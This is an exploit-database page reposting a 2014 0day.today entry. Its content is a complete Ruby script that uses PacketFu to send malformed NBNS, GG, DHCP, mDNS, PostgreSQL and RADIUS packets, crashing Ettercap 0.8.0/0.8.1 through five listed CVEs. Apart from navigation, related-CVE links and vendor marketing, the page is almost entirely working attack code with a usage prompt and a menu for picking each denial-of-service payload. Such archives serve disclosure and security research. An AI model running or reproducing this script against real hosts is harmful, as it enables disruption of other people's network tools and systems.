Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Ettercap 0.8.0 / 0.8.1 Denial Of Service Exploit

🗓️ 21 Dec 2014 00:00:00Reported by Nick SampanisType 
zdt
 zdt🔗 0day.today👁 29 Views

Ettercap 0.8.0/0.8.1 DoS Exploit using multiple vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
ArchLinux		ettercap: multiple issues
17 Mar 201500:00
archlinux
ArchLinux		ettercap-gtk: multiple issues
17 Mar 201500:00
archlinux
CNVD		Ettercap Heap Buffer Overflow Vulnerability
26 Dec 201400:00
cnvd
CVE		CVE-2014-6395
19 Dec 201415:00
cve
CVE		CVE-2014-9376
19 Dec 201415:00
cve
CVE		CVE-2014-9377
19 Dec 201415:00
cve
CVE		CVE-2014-9378
19 Dec 201415:00
cve
CVE		CVE-2014-9379
19 Dec 201415:00
cve
Cvelist		CVE-2014-6395
19 Dec 201415:00
cvelist
Cvelist		CVE-2014-9376
19 Dec 201415:00
cvelist
Rows per page
#Exploit Title: 6 Remote ettercap Dos exploits to 1
#Date: 19/12/2014
#Exploit Author: Nick Sampanis
#Vendor Homepage: http://ettercap.github.io
#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz
#Version: 8.0-8.1
#Tested on: Linux
#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379
#Make sure that you have installed packefu and pcaprub
 
require 'packetfu'
include PacketFu
 
if ARGV.count < 4
    puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface"
    puts "[-]Use valid mac for your interface, if you dont know"+
        " victim's ip address use broadcast"
    exit
end
 
def nbns_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[1]
    u.ip_saddr = ARGV[0]
    u.udp_src = 4444
    u.udp_dst = 137
    u.payload =  "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00"
    u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name
    u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name
    u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name
    u.payload << "\x00\x20" #type
    u.payload << "\x00\x01" #class
    u.payload << "A"*1000 #pad
    u.recalc
    u.to_w(ARGV[3])
end
def gg_client
    u = TCPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_saddr = ARGV[0]
    u.ip_daddr = ARGV[1]
    u.tcp_src = 3333
    u.tcp_dst = 8074
    u.payload = "\x15\x00\x00\x00"  #gg_type
    u.payload << "\xe8\x03\x00\x00" #gg_len
    u.payload << "A"*1000
    u.recalc
    u.to_w(ARGV[3])
end
def dhcp_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[0]
    u.ip_saddr = ARGV[1]
    u.udp_src = 67
    u.udp_dst = 4444
    u.payload =  "\x02"*236
    u.payload << "\x63\x82\x53\x63"
    u.payload << "\x35"
    u.payload << "\x00\x05\x00"
    u.payload << "\x51"
    u.payload << "\x00" #size
    u.payload << "A" * 3 #pad
    u.recalc
    u.to_w(ARGV[3])
end
 
def mdns_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[1]
    u.ip_saddr = ARGV[0]
    u.udp_src = 4444
    u.udp_dst = 5353
    u.payload =  "\x11\x11" #id
    u.payload << "\x00\x00" #flags
    u.payload << "\x00\x01" #questions
    u.payload << "\x00\x00" #answer_rr
    u.payload << "\x00\x00" #auth_rrs
    u.payload << "\x00\x00" #additional_rr
    u.payload << "\x06router\x05local\x00" #name
    u.payload << "\x00\x01" #type
    u.payload << "\x00\x01" #class
    u.recalc
    u.to_w(ARGV[3])
end
def mdns_dos_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[1]
    u.ip_saddr = ARGV[0]
    u.udp_src = 4444
    u.udp_dst = 5353
    u.payload =  "\x11\x11" #id
    u.payload << "\x00\x00" #flags
    u.payload << "\x00\x01" #questions
    u.payload << "\x00\x00" #answer_rr
    u.payload << "\x00\x00" #auth_rrs
    u.payload << "\x00\x00" #additional_rr
    u.payload << "\x01"
    u.payload << "\x00\x01" #type
    u.payload << "\x00\x01" #class
    u.payload << "A"*500
    u.recalc
    u.to_w(ARGV[3])
end
 
def pgsql_server
    u = TCPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_saddr = ARGV[1]
    u.ip_daddr = ARGV[0]
    u.tcp_src = 5432
    u.tcp_dst = 3333
    u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
    u.recalc
    u.to_w(ARGV[3])
end
def pgsql_client
    u = TCPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_saddr = ARGV[0]
    u.ip_daddr = ARGV[1]
    u.tcp_src = 3333
    u.tcp_dst = 5432
    u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
    u.recalc
    u.to_w(ARGV[3])
end
 
def pgsql_client_shell
    u = TCPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_saddr = ARGV[0]
    u.ip_daddr = ARGV[1]
    u.tcp_src = 3333
    u.tcp_dst = 5432
    u.payload = "\x70"
    u.payload << "\x00\x00\x03\xe9" #len
    u.payload << "A"*1000
    u.payload << "\x00"
    u.recalc
    u.to_w(ARGV[3])
end
 
def radius_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[1]
    u.ip_saddr = ARGV[0]
    u.udp_src = 4444
    u.udp_dst = 1645
    u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01"
    u.recalc
    u.to_w(ARGV[3])
end
 
puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis"
puts "[+]-1- nbns plugin CVE-2014-9377"
puts "[+]-2- gg dissector CVE-2014-9376"
puts "[+]-3- dhcp dissector CVE-2014-9376"
puts "[+]-4- mdns plugin CVE-2014-9378"
puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)"
puts "[+]-6- radius dissector CVE-2014-9379"
print "choice:"
choice = $stdin.gets.chomp().to_i()
 
case choice
when 1
    puts "[+]Sending nbns packet.."
    nbns_header
when 2
    puts "[+]Sending client gg packet.."
    gg_client
when 3
    puts "[+]Sending dhcp packet.."
    dhcp_header
when 4
    puts "[+]Sending mdns packet.."
    mdns_header
    mdns_dos_header
when 5
    puts "[+]Sending pgsql packet.."
    pgsql_client
    pgsql_server
    pgsql_client_shell
when 6
    puts "[+]Sending radius packet.."
    radius_header
else
    puts "[-]Unrecognized command "
end

#  0day.today [2018-01-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Dec 2014 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.26583
remote executiondenial of servicecve-2014-6395cve-2014-9376cve-2014-9377cve-2014-9378cve-2014-9379linuxpacketfupcaprubexploit author
29